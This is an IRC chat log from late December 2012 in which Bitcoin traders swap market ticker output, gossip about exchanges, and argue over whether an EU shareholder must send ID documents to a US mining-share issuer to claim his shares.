http://i.imgur.com/iyjWe.jpg Dec 25 02:04:16 well more merry x-mas from zimbabwe: http://i.imgur.com/iyjWe.jpg Dec 25 02:04:45 probably doesn't need to be protected by so much plastic ;) Dec 25 02:04:57 worth more than the note Dec 25 02:05:09 pretty cool, nice Dec 25 02:05:22 pigeons: well Dec 25 02:05:26 if its a mint bill Dec 25 02:05:37 the bill is worth more than the face value Dec 25 02:06:19 well they ain't makin' any more of 'em Dec 25 02:06:33 however, there are plenty to go around Dec 25 02:07:10 Ha ha Dec 25 02:07:15 they're popular among collectors Dec 25 02:07:17 [MPEX] [S.MPOE] 11946 @ 0.00062 = 7.4065 BTC [+] Dec 25 02:07:19 just for the absolute absurdity of it Dec 25 02:07:33 I wouldnt mind having one framed on my wall Dec 25 02:07:54 i love all the zeros Dec 25 02:08:57 haha Dec 25 02:09:53 one hundred TRILLION dollars Dec 25 02:09:57 I'm rich! Dec 25 02:12:43 [MPEX] [S.MPOE] 11588 @ 0.00062 = 7.1846 BTC [+] Dec 25 02:37:54 [MPEX] [S.MPOE] 13000 @ 0.00062 = 8.06 BTC [+] Dec 25 02:44:08 ;;ticker Dec 25 02:44:09 BTCUSD ticker | Best bid: 13.42998, Best ask: 13.42999, Bid-ask spread: 0.00001, Last trade: 13.42998, 24 hour volume: 16577.37893915, 24 hour low: 13.21800, 24 hour high: 13.45000, 24 hour vwap: 13.38007 Dec 25 02:52:50 [MPEX] [S.MPOE] 20269 @ 0.00062 = 12.5668 BTC [+] Dec 25 02:54:22 oh man they have run usagi out of the BTC world Dec 25 02:54:27 what ever happened to patrick harnett? Dec 25 02:55:09 i reckon he still has his job. Dec 25 02:55:24 [MPEX] [S.MPOE] 10953 @ 0.00062 = 6.7909 BTC [+] Dec 25 03:06:45 [MPEX] [S.MPOE] 6100 @ 0.00062 = 3.782 BTC [+] Dec 25 03:09:48 [MPEX] [S.MPOE] 9900 @ 0.00062 = 6.138 BTC [+] Dec 25 03:15:19 [MPEX] [S.MPOE] 2550 @ 0.00062 = 1.581 BTC [+] Dec 25 03:21:10 [MPEX] [S.DICE] 300 @ 0.00353532 = 1.0606 BTC [+] Dec 25 03:23:58 [MPEX] [S.MPOE] 7259 @ 0.00062 = 4.5006 BTC [+] Dec 25 03:25:18 i think usagi is just still weak from the rum-induced stomach flu and will be back again Dec 25 03:28:44 pigeons: Fairy god-mother bernanke is gonna print him some money to cover his debts from what I've heard Dec 25 03:29:56 hmm Dec 25 03:30:04 I kid. I kid. Dec 25 03:30:20 But srsly, looks like I may have to write off some things. Dec 25 03:30:37 [MPEX] [S.MPOE] 1900 @ 0.00062 = 1.178 BTC [+] Dec 25 03:32:09 364,449 shares remaining Dec 25 03:33:14 mircea_popescu's plan seems to have worked... Dec 25 03:33:22 but is it sustainable... Dec 25 03:34:13 no as soon as he stops faking the numbers its over Dec 25 03:38:12 pigeons: what is he faking Dec 25 03:39:10 ;;ticker Dec 25 03:39:11 BTCUSD ticker | Best bid: 13.38126, Best ask: 13.42958, Bid-ask spread: 0.04832, Last trade: 13.38002, 24 hour volume: 15154.09689906, 24 hour low: 13.21800, 24 hour high: 13.45000, 24 hour vwap: 13.38310 Dec 25 03:39:50 he is faking the current gox price duh Dec 25 03:41:37 i was referring to Diablo-D3's thoughts from earlier today Dec 25 03:41:55 hum? Dec 25 03:42:21 Then why wouldn't he forge the bondholder statements for August? Dec 25 03:42:40 [MPEX] [S.MPOE] 14300 @ 0.00062 = 8.866 BTC [+] Dec 25 03:43:10 he mentioned that mircea_popescu doesn't have any money, someone pointed out what was coming itjust from s.mpoe sales recently, and Diablo-D3 mentioned that we don't have verification of those numbers, and in fact Diablo-D3 had considered starting an exchange and faking activity Dec 25 03:43:32 ah, the usual. Dec 25 03:44:21 yep Dec 25 03:44:31 but he is faking the gox price too Dec 25 03:44:49 No but seriously, how is he faking the activity Dec 25 03:44:59 and why? Dec 25 03:46:10 i don't believe that. you know Diablo-D3, that's just how he thinks Dec 25 03:46:58 Diablo-D3 based on based on current standards is less trustworthy than mircea_popescu Dec 25 03:47:18 only because of the loss Dec 25 03:48:13 i'm saying he's the only person mentioning fake numbers, so when i mention it i am teasing Diablo-D3 Dec 25 03:54:26 ;;bc,24hprc Dec 25 03:54:27 13.33 Dec 25 03:54:28 ;;ticker Dec 25 03:54:28 BTCUSD ticker | Best bid: 13.42920, Best ask: 13.42980, Bid-ask spread: 0.00060, Last trade: 13.42980, 24 hour volume: 15183.54987991, 24 hour low: 13.21800, 24 hour high: 13.45000, 24 hour vwap: 13.38328 Dec 25 03:54:41 [MPEX] [S.MPOE] 5700 @ 0.00062 = 3.534 BTC [+] Dec 25 03:57:34 [MPEX] [S.MPOE] 2750 @ 0.00062 = 1.705 BTC [+] Dec 25 04:00:59 [MPEX] [O.BTCUSD.C130T] 3 @ 0.0550204 = 0.1651 BTC [-] Dec 25 04:03:02 [MPEX] [S.MPOE] 13900 @ 0.00062 = 8.618 BTC [+] Dec 25 04:03:05 pigeons: I was curious of your skepticism Dec 25 04:03:30 as you are an MPEX judge Dec 25 04:04:51 i do not believe that mircea_popescu is faking anything Dec 25 04:06:35 unsolicited, I don't believe that mircea_popescu is faking anything (60% confidence livel) Dec 25 04:07:22 i think he really is that annoying, its not fake Dec 25 04:08:19 pigeons: "i think he really is that annoying" << who is he? Dec 25 04:08:48 nevermind, it was a bad joke, no worries Dec 25 04:09:25 pigeons: was that a lesswrong refrence? Dec 25 04:09:47 like, the guy who wrote 'harry potter and the methods of rationality'? Dec 25 04:10:06 no any references are purely coincidental Dec 25 04:10:10 ah Dec 25 04:17:09 !ticker X.IDIFF.DEC Dec 25 04:17:10 [MPEX:X.IDIFF.DEC] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0327929 / 0.0327929 / 0.0327929 (1 shares, 0.03 BTC) Dec 25 04:22:34 [MPEX] [S.MPOE] 13821 @ 0.00062 = 8.569 BTC [+] Dec 25 04:41:27 ;;seen thestringpuller Dec 25 04:41:27 thestringpuller was last seen in #bitcoin-assets 24 minutes and 17 seconds ago: !ticker X.IDIFF.DEC Dec 25 04:41:52 sup bugpowder Dec 25 04:42:04 Tesla IPO'd a while ago Dec 25 04:42:09 Really? Dec 25 04:42:15 ;;google tesla motors ipo Dec 25 04:42:16 Welcome TSLA: Tesla Motors raises $266 million in IPO - CNN Money: ; Tesla Motors shares soar 41% in market debut - MarketWatch: ; Tesla Motors IPO faces new risk: CEO's divorce trial | VentureBeat: (1 more message) Dec 25 04:42:19 SpaceX will IPO in about 2 years Dec 25 04:42:32 my brother works at SpaceX Dec 25 04:42:48 SpaceX is a great company. Dec 25 04:43:01 I almost interned their last summer Dec 25 04:43:59 yes it is very cool Dec 25 04:44:04 it's his dream job Dec 25 04:44:10 just landed it in Nov Dec 25 04:44:11 Uh yea? Dec 25 04:44:16 Shooting rokets in the space Dec 25 04:44:18 fuckkk yea Dec 25 04:45:54 hmm S.DICE whales still going at it Dec 25 04:46:11 Yea Dec 25 04:46:16 short it like a mofo Dec 25 04:46:18 :) Dec 25 04:46:20 [MPEX] [S.MPOE] 10386 @ 0.00062 = 6.4393 BTC [+] Dec 25 04:47:13 [MPEX] [S.MPOE] 9368 @ 0.00062 = 5.8082 BTC [+] Dec 25 04:48:34 77,000 BTC bet, 2500BTC S.DICE profit Dec 25 04:49:47 Its like a lottery... Dec 25 04:50:00 Every employee at spaceX still has to be personally approved by musk Dec 25 04:50:12 for the final round of interviews Dec 25 04:50:40 [MPEX] [S.MPOE] 5950 @ 0.00062 = 3.689 BTC [+] Dec 25 04:52:12 [MPEX] [S.MPOE] 4471 @ 0.00062 = 2.772 BTC [+] Dec 25 04:53:12 I heard from my friend Musk is weird as shit. Dec 25 04:54:35 S.DICE the bitcoin casino Dec 25 05:02:56 ;;seen Ukto Dec 25 05:02:57 Ukto was last seen in #bitcoin-assets 8 hours, 35 minutes, and 33 seconds ago: I stated quite clearly that 'some buttons were pressed on my side'. How he wishes to interpret that is up to him. Dec 25 05:16:53 [MPEX] [S.MPOE] 10082 @ 0.00062 = 6.2508 BTC [+] Dec 25 05:34:03 [MPEX] [S.MPOE] 15000 @ 0.00062 = 9.3 BTC [+] **** BEGIN LOGGING AT Tue Dec 25 13:06:02 2012 Dec 25 13:15:37 [MPEX] [S.MPOE] 1800 @ 0.00064 = 1.152 BTC [+] Dec 25 13:37:02 [MPEX] [S.MPOE] 14538 @ 0.00064 = 9.3043 BTC [+] Dec 25 14:09:54 [MPEX] [S.MPOE] 11550 @ 0.00064 = 7.392 BTC [+] Dec 25 14:12:10 [MPEX] [S.DICE] 800 @ 0.00354404 = 2.8352 BTC [+] Dec 25 14:15:12 [MPEX] [S.MPOE] 11000 @ 0.00064 = 7.04 BTC [+] Dec 25 14:22:32 [MPEX] [S.MPOE] 5950 @ 0.00064 = 3.808 BTC [+] Dec 25 14:28:22 [MPEX] [S.MPOE] 5200 @ 0.00064 = 3.328 BTC [+] Dec 25 15:22:36 [MPEX] [S.MPOE] 10100 @ 0.00064 = 6.464 BTC [+] Dec 25 15:25:34 [MPEX] [S.MPOE] 7350 @ 0.00064 = 4.704 BTC [+] Dec 25 15:30:35 [MPEX] [S.MPOE] 4550 @ 0.00064 = 2.912 BTC [+] Dec 25 15:49:56 It is Christmas Day. Good news, I don't have to work. Bad news, I don't get paid Dec 25 15:51:48 not if i'm self-employed... Dec 25 15:54:29 [MPEX] [S.MPOE] 9600 @ 0.00064 = 6.144 BTC [+] Dec 25 15:56:11 that would be me :-) Dec 25 16:00:28 dunno, I might then be committed for hearing voices? Dec 25 16:10:03 [MPEX] [S.MPOE] 2800 @ 0.00064 = 1.792 BTC [+] Dec 25 16:27:16 [MPEX] [S.MPOE] 4104 @ 0.00064 = 2.6266 BTC [+] Dec 25 16:30:56 [MPEX] [S.MPOE] 18634 @ 0.00064 = 11.9258 BTC [+] Dec 25 16:37:01 [MPEX] [S.MPOE] 1665 @ 0.00064 = 1.0656 BTC [+] Dec 25 16:38:06 SATOSHIIIII DICEEE Dec 25 16:43:01 [MPEX] [S.MPOE] 8150 @ 0.00064 = 5.216 BTC [+] Dec 25 16:43:52 [MPEX] [S.MPOE] 2213 @ 0.00064 = 1.4163 BTC [+] Dec 25 16:57:13 [MPEX] [S.MPOE] 6407 @ 0.00064 = 4.1005 BTC [+] Dec 25 17:14:12 [MPEX] [S.MPOE] 2700 @ 0.00064 = 1.728 BTC [+] Dec 25 17:25:46 [MPEX] [S.MPOE] 600 @ 0.00064 = 0.384 BTC [+] Dec 25 17:30:35 [MPEX] [S.DICE] 5000 @ 0.00354059 = 17.703 BTC [-] Dec 25 17:59:34 nethead, Roger Ver's nemesis, has this forum sig: Disclaimer: Do not sent any coins by mistake, i will keep them. Dec 25 18:27:06 [MPEX] [S.MPOE] 11000 @ 0.00064 = 7.04 BTC [+] Dec 25 18:34:50 [MPEX] [S.MPOE] 17107 @ 0.00064 = 10.9485 BTC [+] Dec 25 18:40:04 [MPEX] [S.MPOE] 5400 @ 0.00064 = 3.456 BTC [+] Dec 25 18:48:17 [MPEX] [S.MPOE] 7155 @ 0.00064 = 4.5792 BTC [+] Dec 25 18:51:50 [MPEX] [S.MPOE] 7636 @ 0.00064 = 4.887 BTC [+] Dec 25 19:16:11 [MPEX] [S.MPOE] 15452 @ 0.00064 = 9.8893 BTC [+] Dec 25 19:19:04 [MPEX] [S.MPOE] 9500 @ 0.00064 = 6.08 BTC [+] Dec 25 19:44:11 [MPEX] [S.MPOE] 17450 @ 0.00064 = 11.168 BTC [+] Dec 25 19:54:08 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.09871751 = 98.7175 BTC [+] Dec 25 19:54:20 [MPEX] [O.BTCUSD.C130T] 1000 @ 0.04991307 = 49.9131 BTC [-] Dec 25 19:54:32 [MPEX] [O.BTCUSD.C140T] 1000 @ 0.02201012 = 22.0101 BTC [-] Dec 25 19:54:33 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.17407439 = 174.0744 BTC [+] Dec 25 20:16:44 [MPEX] [S.MPOE] 1545 @ 0.00064 = 0.9888 BTC [+] Dec 25 20:18:03 [MPEX] [S.MPOE] 5350 @ 0.00064 = 3.424 BTC [+] Dec 25 20:31:54 ;;ticker Dec 25 20:31:55 BTCUSD ticker | Best bid: 13.30931, Best ask: 13.35000, Bid-ask spread: 0.04069, Last trade: 13.30931, 24 hour volume: 15246.85529519, 24 hour low: 13.14000, 24 hour high: 13.45000, 24 hour vwap: 13.34425 Dec 25 20:36:15 [MPEX] [S.MPOE] 35300 @ 0.00064 = 22.592 BTC [+] Dec 25 20:41:16 [MPEX] [O.BTCUSD.C100T] 820 @ 0.24943126 = 204.5336 BTC [-] Dec 25 20:51:04 [MPEX] [S.MPOE] 5251 @ 0.00064 = 3.3606 BTC [+] Dec 25 20:57:34 [MPEX] [S.MPOE] 40000 @ 0.00064 = 25.6 BTC [+] Dec 25 20:59:02 [MPEX] [S.MPOE] 14522 @ 0.00064 = 9.2941 BTC [+] Dec 25 21:07:17 pigeons: nethead is bulanula... :-) Dec 25 21:07:48 [MPEX] [S.MPOE] 2000 @ 0.00064 = 1.28 BTC [+] Dec 25 21:09:18 ;;bc,stats Dec 25 21:09:28 ;;bc,stats Dec 25 21:09:31 ;;bc,stat Dec 25 21:09:35 ??? Dec 25 21:09:39 Error: invalid syntax (, line 1) Dec 25 21:10:05 Error: invalid syntax (, line 1) Dec 25 21:10:05 Error: "bc,stat" is not a valid command. Dec 25 21:10:36 smickles Dec 25 21:10:46 merry christmas Dec 25 21:11:15 thestringpuller: I hope you enjoy your holiday :) Dec 25 21:11:32 if we win the war on fiat i will :) Dec 25 21:11:39 so, big diff drop coming soon Dec 25 21:11:47 but as my mom says: one day at a timr Dec 25 21:12:11 miners went offline like you predicted Dec 25 21:12:12 heh, yeah, not likely to 'win the war' today Dec 25 21:12:23 im sure the asic bubble didnt hp Dec 25 21:12:27 help Dec 25 21:12:32 it's shapped up to be the largest drop in history Dec 25 21:14:16 whoever wrote the X.IDIFF.DEC is probably pissed Dec 25 21:16:30 thestringpuller: but no volume? Dec 25 21:17:09 !ticker X.IDIFF.DEC Dec 25 21:17:10 [MPEX:X.IDIFF.DEC] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0327929 / 0.0327929 / 0.0327929 (1 shares, 0.03 BTC) Dec 25 21:17:24 one contract Dec 25 21:17:25 lol Dec 25 21:18:07 there are more for mar and jun, 20, 170 respectively Dec 25 21:18:31 i know but diff is super volatile Dec 25 21:20:06 are there European People that send Personal information to lets say gigavps? Dec 25 21:20:12 plz read this Dec 25 21:20:36 BEWARE: according to European law, We (European citizens) may not transfer our ID (our a copy of it) to a third party (Outside the EU, like gigavps lawyer)!! Dec 25 21:20:36 Here is a list of countries which by law are not allowed to send their ID to third parties (Countries outside the EU) Dec 25 21:20:36 Member states of the EU: Dec 25 21:20:36 (year of entry) Dec 25 21:20:37 Austria (1995) Dec 25 21:20:39 Belgium (1952) Dec 25 21:20:41 Bulgaria (2007) Dec 25 21:20:43 Cyprus (2004) Dec 25 21:20:45 Czech Republic (2004) Dec 25 21:20:47 Denmark (1973) Dec 25 21:20:49 Estonia (2004) Dec 25 21:20:51 Finland (1995) Dec 25 21:20:53 France (1952) Dec 25 21:20:54 Germany (1952) Dec 25 21:20:57 Greece (1981) Dec 25 21:21:01 Hungary (2004) Dec 25 21:21:03 Ireland (1973) Dec 25 21:21:05 Italy (1952) Dec 25 21:21:07 Latvia (2004) Dec 25 21:21:09 Lithuania (2004) Dec 25 21:21:11 Luxembourg (1952) Dec 25 21:21:13 Malta (2004) Dec 25 21:21:15 Netherlands (1952) Dec 25 21:21:17 Poland (2004) Dec 25 21:21:19 Portugal (1986) Dec 25 21:21:21 Romania (2007) Dec 25 21:21:23 Slovakia (2004) Dec 25 21:21:25 Slovenia (2004) Dec 25 21:21:29 Spain (1986) Dec 25 21:21:31 Sweden (1995) Dec 25 21:21:33 United Kingdom (1973) Dec 25 21:21:35 so DONT send your personal info, It can be used for Identity theft Dec 25 21:21:37 retc Dec 25 21:21:39 etc Dec 25 21:22:08 Asking for your ID etc is a CRIMINAL action according to the EU law Dec 25 21:22:22 hm Dec 25 21:22:31 how about gox verification Dec 25 21:22:52 true this info comes fr4om the Dutch Law institute, I called them Dec 25 21:23:31 should be the same, dont send info to gox either unless they are EU company Dec 25 21:26:21 [MPEX] [S.MPOE] 1902 @ 0.00064 = 1.2173 BTC [+] Dec 25 21:29:17 So in short, you are all (if EU citizen) in the right to not send him (gigavps or his so called lawyer) anything. You can evemn sue him because of this action Dec 25 21:31:04 To get him sued, ed start a lawsuit against him this will cost 700euro initial (we wont get it back if we lose the case) Dec 25 21:31:35 but I am prepared to pay this out of my own pocket Dec 25 21:35:27 [MPEX] [S.MPOE] 13800 @ 0.00064 = 8.832 BTC [+] Dec 25 21:37:01 So if anyone is intrested in buying 117 Gigamining shares, let me know Dec 25 21:37:14 I want to get rid of that crap Dec 25 21:38:26 otherwise sue the crap spreader Dec 25 21:38:37 psychoticboy, did they said exact name of the law? Dec 25 21:40:22 and why would eu-based companies be exempt? Dec 25 21:40:50 hmmmn they probably did, but I was too upset/angry/mad or how you will call it, I have to call them back and let them send it too me by mail. for proof Dec 25 21:40:57 EU law Dec 25 21:41:16 rly helpful Dec 25 21:41:17 presumably it is the european union data protection regulation? https://docs.google.com/viewer?a=v&q=cache:lUJQqe8liYYJ:ec.europa.eu/justice/data-protection/document/review2012/com_2012_11_en.pdf+&hl=en&gl=uk&pid=bl&srcid=ADGEESg6Fc7Joam_K8q_zFqQnprfwiloP_7Y78An3PYhz5keRiLYReE0jHCxyphxiDVgsJXxOhg5F6zXrrA90o0iYOzCj9-NFWaieaF-99ObOeSjStK85XMur8tYt8FgajpC6tFCpmEr&sig=AHIEtbQOj-0uVTGmkbd5sL2lSFx523Sho Dec 25 21:41:29 EU LAW IS ABOVE US LAW FOR EU CITIZEN!! Dec 25 21:41:50 unless there is a reciprocal arrangement Dec 25 21:42:41 [MPEX] [S.MPOE] 9000 @ 0.00064 = 5.76 BTC [+] Dec 25 21:42:47 sorry we're unable to find teh document Dec 25 21:43:00 ^markedathome Dec 25 21:43:27 I explained the whole story to the lawyer/judge I talked with and they told me this: Dont send your ID to a non EU country registred company Dec 25 21:44:02 I said it was a person, then they said dont send data EVER! Dec 25 21:44:31 [MPEX] [S.MPOE] 6220 @ 0.00064 = 3.9808 BTC [+] Dec 25 21:44:33 cause the chance for identity theft is big+ it is a illigal action Dec 25 21:45:01 but I am going to my christmas dinner, see you guys later Dec 25 21:45:07 jurov: sorry, googled "european union distribution outside of personal documents" and 4th down. used the quick view link - didn't realise it was user specific Dec 25 22:00:00 indeed it's dangerous to give anyone your ID number and illegal for third parties to process it Dec 25 22:00:35 and usually ID card have it Dec 25 22:00:49 so mybe that's it Dec 25 22:01:02 [MPEX] [S.MPOE] 25482 @ 0.00064 = 16.3085 BTC [+] Dec 25 22:01:40 [MPEX] [S.MPOE] 9900 @ 0.00064 = 6.336 BTC [+] Dec 25 22:04:32 [MPEX] [S.MPOE] 5000 @ 0.00064 = 3.2 BTC [+] Dec 25 22:08:49 PsychoticBoy : how much will you sell gigamining shares for? Dec 25 22:09:34 I have yet to send in my AML data but will soon. Would be willing to pick some shares up at a reasonable price. Dec 25 22:14:52 rate stealth222 2 trust his code Dec 25 22:14:57 ;;rate stealth222 2 trust his code Dec 25 22:14:58 Rating entry successful. Your rating of 2 for user stealth222 has been recorded. Dec 25 22:18:53 [MPEX] [S.MPOE] 1400 @ 0.00064 = 0.896 BTC [+] Dec 25 22:31:37 SATOSHIIIII Dec 25 22:31:38 DICE Dec 25 22:35:31 [MPEX] [S.MPOE] 9150 @ 0.00064 = 5.856 BTC [+] Dec 25 22:35:48 S.DICE revenue up to 33,000 Dec 25 22:36:03 ;;calc 33000-16200 Dec 25 22:36:03 16800 Dec 25 22:36:29 ;;calc 16800/.0034/100000000 Dec 25 22:36:30 0.0494117647059 Dec 25 22:36:39 ;;calc 16800/.0035/100000000 Dec 25 22:36:40 0.048 Dec 25 22:37:33 4.8% dividend this month Dec 25 22:40:33 lol that change several times yet Dec 25 22:40:44 with all these whales Dec 25 22:41:34 *that can Dec 25 23:11:27 man Dec 25 23:11:35 Im almost envious of inaba Dec 25 23:11:42 he gets paid to troll Dec 25 23:28:26 [MPEX] [S.MPOE] 3900 @ 0.00064 = 2.496 BTC [+] Dec 26 00:00:40 [MPEX] [S.MPOE] 1800 @ 0.00064 = 1.152 BTC [+] Dec 26 00:03:01 EskimoBob: is a shit slinger Dec 26 00:03:18 who slings poopoo like a chimpanzee Dec 26 00:03:41 [MPEX] [S.MPOE] 8050 @ 0.00064 = 5.152 BTC [+] Dec 26 00:08:41 [MPEX] [S.MPOE] 12600 @ 0.00064 = 8.064 BTC [+] Dec 26 00:11:45 [MPEX] [S.MPOE] 10900 @ 0.00064 = 6.976 BTC [+] Dec 26 00:14:58 [MPEX] [S.MPOE] 2707 @ 0.00064 = 1.7325 BTC [+] Dec 26 00:21:45 mpfk-pr << a word that you do not often hear Dec 26 00:21:50 ;) Dec 26 00:21:58 [MPEX] [S.MPOE] 2850 @ 0.00064 = 1.824 BTC [+] Dec 26 00:22:16 PsychoticBoy : how much will you sell gigamining shares for? 0.2 btc Dec 26 00:26:28 PsychoticBoy: thought you couldn't sell them Dec 26 00:28:06 good evening Dec 26 00:28:17 wow - good timing giga Dec 26 00:28:37 stuffed from Christmas dinner Dec 26 00:28:43 can barely move Dec 26 00:28:43 nice Dec 26 00:29:00 laying on couch with laptop propped on distended belly ;) Dec 26 00:29:43 too many cookies, my mother makes some pretty awesome cookies Dec 26 00:31:08 yumm Dec 26 00:31:33 hmm PsychoticBoy was around a bit ago talking about GIGAMINING Dec 26 00:31:38 not sure where he went Dec 26 00:32:18 well, selling gigamining since the close of glbse will most likely void any claim Dec 26 00:32:31 so buyer beware Dec 26 00:32:38 OK - that clarifies Dec 26 00:32:43 thks for that Dec 26 00:33:02 one of the huge reasons GLBSE closed was because they had no idea who their customers were Dec 26 00:33:03 [MPEX] [S.MPOE] 10500 @ 0.00064 = 6.72 BTC [+] Dec 26 00:33:19 and they were supposed to be reporting gains/loses Dec 26 00:33:29 simple kyc stuff Dec 26 00:33:43 all of the new exchange will have the same problems Dec 26 00:35:29 i've read the TOS for some of the sites, and treating the exchange as a "experiment/learning" will not keep them out of court when the government comes calling Dec 26 00:49:33 [MPEX] [S.MPOE] 2010 @ 0.00064 = 1.2864 BTC [+] Dec 26 01:02:17 hmmn he left Dec 26 01:03:18 I think I will get giga into court, I contacted O Hammerstein, my lawyer, and he wants action Dec 26 01:04:26 yes it is one of the best lawyers in The Netherlands (and expensive) but he is like a pitbull Dec 26 01:04:31 [MPEX] [S.DICE] 774 @ 0.00354059 = 2.7404 BTC [-] Dec 26 01:08:00 [MPEX] [S.MPOE] 8728 @ 0.00064 = 5.5859 BTC [+] Dec 26 01:16:33 [MPEX] [S.DICE] 500 @ 0.00345868 = 1.7293 BTC [-] Dec 26 01:19:51 PsychoticBoy: why are you going to get giga into court Dec 26 01:19:54 * Dec 26 01:20:51 I am sick of people who make their own rules, Bitcoin is a semi annonymous coin traded in a free market Dec 26 01:21:10 He did not need my ID or such when I took my coins Dec 26 01:21:35 PsychoticBoy: man I wish dmc could afford a lawyer Dec 26 01:21:36 Now when things are getting ugly, he goes by the law etc F Dec 26 01:22:00 I will outsource all I got If I have to Dec 26 01:22:48 PsychoticBoy: I think I missed something. What did gigia exactly do? Dec 26 01:22:53 allthough I only own 117 Giga shares, does not mean I have to let ppl walk over me Dec 26 01:23:37 For real persons: a photocopy or scanned PDF of government issued photo identification, or, for corporations the document number and issuing jurisdiction of the incorporating charter and proof of current good standing. Dec 26 01:23:37 An affidavit attesting to the beneficial assignment of the agreement, which has been notarized (US residents/corporations) or local equivalent bearing the apostille of the competent jurisdiction. Copies of an acceptable affidavit can be obtained upon request from the law offices. Dec 26 01:23:46 ^^^^ this is the problem Dec 26 01:23:52 Wait what Dec 26 01:23:55 I'm so confused Dec 26 01:23:58 My ID etc Dec 26 01:24:11 F him he wont get it and its against EU Law Dec 26 01:24:47 he is no EU company If he does own a company that is registred Dec 26 01:25:09 If he even has one Dec 26 01:25:59 I dont mind payoing 1000euro for a lawyer to get him hanged Dec 26 01:26:04 so he wants Dec 26 01:26:32 even if the 117 sahres arent worth shit Dec 26 01:26:36 "papers" Dec 26 01:26:40 in order to claim the shares Dec 26 01:26:41 yep Dec 26 01:27:00 https://bitcointalk.org/index.php?topic=127488.0 Dec 26 01:27:27 wait Dec 26 01:27:32 why are we tagging giga as a scammer? Dec 26 01:27:42 [MPEX] [S.MPOE] 15157 @ 0.00064 = 9.7005 BTC [+] Dec 26 01:27:47 he is not getting taged Dec 26 01:27:55 he will not get one Dec 26 01:28:07 good Dec 26 01:28:12 has giga even done anything wrong yet? Dec 26 01:28:18 its only not a reasonable thing to do, ask for ppl personal data Dec 26 01:28:44 well people will stop giving him money? Dec 26 01:28:53 sure Dec 26 01:28:53 thestringpuller: erm, they cant Dec 26 01:28:57 he hasnt relisted anywhere Dec 26 01:29:07 people have the right to liquidate no? Dec 26 01:29:20 He wont get another btc from me as he already took more than 70 BTC (117 shares) Dec 26 01:29:35 what, hes not buying the shares back? Dec 26 01:29:59 no You can claim be sending your ID, address etc and an affidavit Dec 26 01:30:17 by* Dec 26 01:30:39 so this is fucking bullshit Dec 26 01:30:52 sorry for my language on christmas Dec 26 01:30:56 hrm Dec 26 01:31:01 I wonder if his lawyer told him to do that Dec 26 01:31:06 yep Dec 26 01:31:14 then I wouldnt scammer tag him Dec 26 01:31:22 his lawyer knows more about this shit than any of us do Dec 26 01:31:41 just another reason to excommunicate nefario, imo Dec 26 01:31:45 I have the feeling he just want his ass covered by a lawyer and not pay out shareholders Dec 26 01:31:53 I dont Dec 26 01:32:00 he may have actually violated the law somewhere Dec 26 01:32:49 thestringpuller: they have the right to request liquidation through a motion if that is allowed in the contract Dec 26 01:33:00 I talked with an lawyer here in Holland and he told me what gigavps or his lawyer is doing is in opposition to Dec 26 01:33:00 the Dutch and EU Law Dec 26 01:33:12 yes, but giga is american Dec 26 01:33:34 but as EU citizen I am not allowed to send him my details if I wanted that Dec 26 01:33:47 if he is incorporated in a state that requires a list of all shareholders to be published Dec 26 01:33:50 then thats the way it is Dec 26 01:33:56 and yes, that actually IS such a thing Dec 26 01:34:44 He is playing by the rules (like he said) But if I am playing by the rules (Dutch/EU law) I get fucked hmmmn that can not be possible Dec 26 01:34:54 yes it can Dec 26 01:35:01 eu and us law do not always jive Dec 26 01:35:08 haha of course its possible Dec 26 01:35:21 us law and us law do not always ive Dec 26 01:35:21 I noticed that by now Dec 26 01:35:27 pigeons: that too Dec 26 01:35:37 PsychoticBoy: problem is, you fucked yourself when you invested in an american company Dec 26 01:35:55 thats neither a good or a bad thing. its a statement of fact. Dec 26 01:36:01 so in otherwords this is a shitty situation for me, I am pushed into a cornerr Dec 26 01:36:11 PsychoticBoy: why not just comply with his request? Dec 26 01:36:19 NO Dec 26 01:36:22 NEVER Dec 26 01:36:32 He makes NEW rules Dec 26 01:36:39 he didnt make new rules Dec 26 01:36:43 He could just payout Dec 26 01:36:58 if his lawyer has advised him to comply with US laws, then the government is the one that made the rules, not him Dec 26 01:37:04 more fun to throw a fit Dec 26 01:37:04 [MPEX] [S.MPOE] 13250 @ 0.00064 = 8.48 BTC [+] Dec 26 01:37:09 he cant payout to shareholders Dec 26 01:37:12 that would be illegal Dec 26 01:37:57 I own 2 shares of gigamining the other 115 shares are owned by FDBF so its a loss for investors if I dont do what giga said but its a matter of principle Dec 26 01:38:30 what's FDBF Dec 26 01:38:33 then register fdbf as a company, then claim and pay out to your shareholders and then dissolve the company Dec 26 01:38:39 my fund on GLBSE Dec 26 01:39:03 registering a company here in The Netherlands will cost me so NO Dec 26 01:39:20 then you lose. Dec 26 01:39:25 no investors Dec 26 01:39:28 klose Dec 26 01:39:35 oh no, they'll just go after you. Dec 26 01:39:38 so you lose. Dec 26 01:39:42 investors who trusted you to look after their interests Dec 26 01:39:42 I lose 2 shares they will lose 115 Dec 26 01:39:47 [MPEX] [S.MPOE] 14750 @ 0.00064 = 9.44 BTC [+] Dec 26 01:39:51 so you lose their goodwill Dec 26 01:40:00 and you may end up getting scammertagged on the forums as well Dec 26 01:40:05 sure, I allready lost ppls good will Dec 26 01:40:28 I allready have a thread in Scam accusations Dec 26 01:40:42 not that I am proud of Dec 26 01:41:21 I will not get tagged for not sending personal details, theymos already told me that Dec 26 01:41:58 so if the shares will not be claimed by me by sending personal data then its poof gone Dec 26 01:42:01 and thats it Dec 26 01:42:54 find out how much it'll cost to register the company Dec 26 01:43:04 if its more than the 117 shares are worth, I wouldnt do it either Dec 26 01:43:04 And guess what I will not send that data ever Dec 26 01:43:20 It will cost me 68 euro Dec 26 01:43:28 to registrer Dec 26 01:43:36 so NO Dec 26 01:43:51 he can keep the change the filty animal Dec 26 01:43:56 lol Dec 26 01:43:58 okay, thats about 7 BTC Dec 26 01:44:06 how much are 117 giga worth? Dec 26 01:44:12 yep for probably 117 x 0.3? Dec 26 01:44:13 I bet more than 7 BTC Dec 26 01:44:31 sure but I will not spend my ID on a company Dec 26 01:44:32 35 btc. Dec 26 01:44:42 PsychoticBoy: thats why you form the company Dec 26 01:44:47 you send him the corporate details Dec 26 01:44:52 complete with worthless po box Dec 26 01:44:52 I WANNA LOSE MONEY, ITS THE PRINCIPAL Dec 26 01:44:54 yeah in an open free market Dec 26 01:45:18 PsychoticBoy: you want to make this as hard as possible for giga Dec 26 01:45:23 comply with his requests. Dec 26 01:45:27 when he doesnt, sue him Dec 26 